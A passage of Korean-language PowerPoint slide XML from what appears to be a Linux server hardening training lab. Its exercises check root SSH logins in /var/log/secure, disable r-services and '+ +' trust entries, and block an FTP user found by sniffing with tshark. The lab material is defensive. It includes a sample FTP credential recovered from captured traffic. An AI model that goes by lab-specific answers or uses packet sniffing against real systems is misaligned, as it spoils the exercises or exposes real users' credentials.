              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>rwxr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>-x-r-x) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>및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chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> 755 /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>stty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ls –l /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>stty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/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>stty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일의 소유자 변경</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(test) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>및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chown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> test /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>stty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ls –l /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>stty</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="Picture 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B93E2FFA-2307-4CB3-8A4F-B1B3CDB20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34" y="5334930"/>
            <a:ext cx="4556760" cy="70866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1) check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>입력 및 키코드 획득</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># check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19344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/Training/Unit/Sys/2</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 2.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시스템 로그 점검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4"/>
            <a:ext cx="4432683" cy="180000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/var/log/secure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로그를 점검하여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root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계정으로 원격 접속을 시도한 호스트의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주소를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찾아내시오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pic>
        <p:nvPicPr>
          <p:cNvPr id="34" name="Picture 10" descr="question icon 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B505F5E5-1AFC-4BE0-A2FB-19F018AC4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9"/>
            <a:ext cx="4432682" cy="180000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  <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pP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 내용 검색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grep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키워드 파일명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로그를 점검 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endParaRPr lang="ko-KR" altLang="en-US" sz="12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(CentOS 6.4)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88673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/var/log/secure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>로그에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>검색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grep root /var/log/secure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 ※ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>192.168.174.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>를 통해 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>로 로그인</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>했음을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check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>및 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>주소 입력 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>키코드</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 획득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check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로그에서 발견한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>주소 입력</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14757363-6E3B-4AF9-B363-510E4A430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86" y="876481"/>
            <a:ext cx="5019040" cy="29006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EBFE7B-6841-478B-8867-ACE3C2831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64516"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="611934" y="4114973"/>
          <a:ext cx="4932807" cy="492506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678078871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grep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명령어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11947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grep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키워드 파일명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파일에서 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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키워드가 포함된 행</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="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(line)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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모두 출력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096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196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/Training/Unit/Sys/3</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 3.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R-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명령어 제한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1967065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실습서버의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R-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(rlogin,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rsh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rexec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중지하고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수록된 호스트 정보를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삭제하시오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호스트 정보 파일의 소유자 외에는 접근할 수 없도록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pic>
        <p:nvPicPr>
          <p:cNvPr id="34" name="Picture 10" descr="question icon 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B505F5E5-1AFC-4BE0-A2FB-19F018AC4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9"/>
            <a:ext cx="4432682" cy="198199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  <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pP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텍스트 파일 편집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vi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파일명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 접근 권한 변경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chmod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접근권한 파일명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재시작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service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서비스명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restart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R-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명령어를 제한 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(CentOS 6.4)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02467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rlogin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>비활성화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xinetd.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/rlogin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“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>disable = no”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>disable = yes”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>로 변경 후 저장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 * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>변경전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 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* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>변경후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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>rsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>비활성화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xinetd.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>rsh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“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>disable = no”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>disable = yes”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>로 변경 후 저장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en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>rexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>비활성화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xinetd.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>rexec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“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>disable = no”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>disable = yes”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>로 변경 후 저장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4) R-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서비스 비활성화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cat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xinetd.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/rlogin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xinetd.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>rsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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xinetd.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>rexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> | grep disable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5)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hosts.equiv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일의 호스트 정보 삭제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hosts.equiv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+ + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>삭제 후 저장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8117098-AC2E-4AF9-9B78-9B94DCD8EB8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505" b="39473"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="682069" y="1553846"/>
            <a:ext cx="4777613" cy="1568565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{705017E2-13E1-4A43-9389-2A1938DE6A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1694" b="38526"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="682069" y="3693635"/>
            <a:ext cx="4858531" cy="1580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26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38D9FDA7-4D1A-471D-A4F2-45FC2B0ED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853" y="1327531"/>
            <a:ext cx="4975733" cy="734187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C07CCF-A532-44CD-A607-091A7696E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853" y="3020251"/>
            <a:ext cx="3863445" cy="334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42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6) /root/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>rhosts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일의 호스트 정보 삭제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vi /root/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>rhosts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+ + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>삭제 후 저장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7) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>xinetd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서비스 재시작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service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>xinetd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> restart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400705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8)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hosts.equiv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일 접근 권한 변경 및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chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> 700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hosts.equiv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ls –l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hosts.equiv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9) /root/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>rhosts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일의 접근 권한 변경 및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chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> 700 /root/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>rhosts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ls –l /root/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>rhosts</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1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8E8F543-4B21-4BE2-A553-C48DB650C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121466"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="633303" y="515452"/>
          <a:ext cx="4932807" cy="1224026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2673947949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/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etc/hosts.equiv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365527"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="8442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r-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명령어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(rlogin,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rsh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rcp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사용이 허가 또는 거부된 호스트들 및 사용자들을 나열한 파일이다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위의 예에서 첫 번째 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+’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기호는 모든 호스트들이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r-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명령어를 사용할 수 있도록 신뢰함을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 번째 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+’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기호는 앞서 허용된 호스트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즉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호스트들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모든 사용자들이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r-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명령어를 사용할 수 있도록 신뢰함을 뜻한다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54844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95D251-DD24-49C0-B60E-4994D7E7A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794911"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="633303" y="2867809"/>
          <a:ext cx="4932807" cy="1711706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517726316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~/.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rhost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990713"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="14538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hosts.equiv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파일과 유사하게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rcp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사용이 허가 또는 거부된 호스트들 및 사용자들을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나열한 파일이다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위의 예에서 첫 번째 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+’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기호는 모든 호스트들이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r-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명령어를 사용할 수 있도록 신뢰함을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 번째 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+’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기호는 앞서 허용된 호스트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즉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호스트들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모든 사용자들이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r-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명령어를 사용할 수 있도록 신뢰함을 뜻한다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hosts.equiv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파일에 수록된 호스트들 및 사용자들은 시스템에 전역적으로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(globally)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적용되지만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.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rhost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파일에 수록된 호스트들 및 사용자들은 해당 계정 접근 시에만 적용된다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992199"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{968E0337-4106-4EAC-BF96-386F65B18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32" y="5380115"/>
            <a:ext cx="5019040" cy="670433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3" name="Picture 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8548DEE-1065-4E82-B67E-6CE038ADB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728" y="1111454"/>
            <a:ext cx="4861560" cy="1089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32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D747B25A-341F-4D83-BF42-F6B408465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728" y="3216932"/>
            <a:ext cx="4602480" cy="101346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FEDB8B-2514-4783-911F-090859734658}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183086" y="4522543"/>
            <a:ext cx="5616792" cy="196645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1) check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>입력 및 키코드 획득</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># check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15204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/Training/Unit/Sys/4</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 4.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계정 원격 접속 탐지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서버의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FTP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서비스에 접속하여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 중인 사용자를 패킷 분석 도구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tshark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알아내고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vsftpd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설정을 통해 해당 계정의 접속을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차단하시오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pic>
        <p:nvPicPr>
          <p:cNvPr id="34" name="Picture 10" descr="question icon 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B505F5E5-1AFC-4BE0-A2FB-19F018AC4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  <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pP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1)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패킷 캡처 및 저장 시작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tshark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-c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패킷수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–w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파일명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저장된 패킷 보기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tshark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–r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파일명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vsftpd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차단 사용자 목록 파일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vsftpd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user_list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4)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재시작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service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서비스명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restart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원격 접속을 탐지하고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(CentOS 6.4)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95979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0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200</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>개의 패킷 캡처 및 저장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tshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> -c 200 –w packet.txt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2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>저장된 패킷 검토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tshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> -r packet.txt | more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 ※ navy123 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>비밀번호 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>: qwer1031) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>사용자가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>FTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>에 접속했음을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en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>vsftpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>차단 사용자 목록에 해당 계정 추가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9"/>
            <a:ext cx="5616792" cy="5052088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   #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vsftpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>user_list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맨 마지막에 ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>navy123’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>입력 후 저장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4) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>vsftpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서비스 재시작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service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>vsftpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> restart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※ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>다시 패킷을 캡처하면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>navy123 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>사용자의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>FTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>접근이 거부됨을 확인할 수 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7" name="Picture 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3E184BD-4519-40CB-8627-41235BA5CE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4" t="80601" r="19333" b="2136"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="570593" y="920963"/>
            <a:ext cx="4300093" cy="602107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847C6A-0C4E-40C3-B79F-B635824B7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818298"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="570593" y="1658568"/>
          <a:ext cx="4932807" cy="980186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181491520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tshark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옵션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192671"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="6410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-c :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캡처할 패킷들의 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-w :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캡처한 패킷들을 저장할 파일 이름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-r :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캡처된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패킷들이 저장된 파일 이름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779775"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B2D52D7-8B2A-431B-90DB-7A08F5C322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4" t="13784" r="1234" b="4042"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="570022" y="3277627"/>
            <a:ext cx="4841422" cy="2572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38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EEEF75B-AA02-45F9-9FA8-FEEA823750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-294" b="14213"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6281892" y="855949"/>
            <a:ext cx="5033807" cy="22476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3E24A63-6A2A-4567-9AEC-153B392CE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55532"/>
              </p:ext>
            </p:extLst>
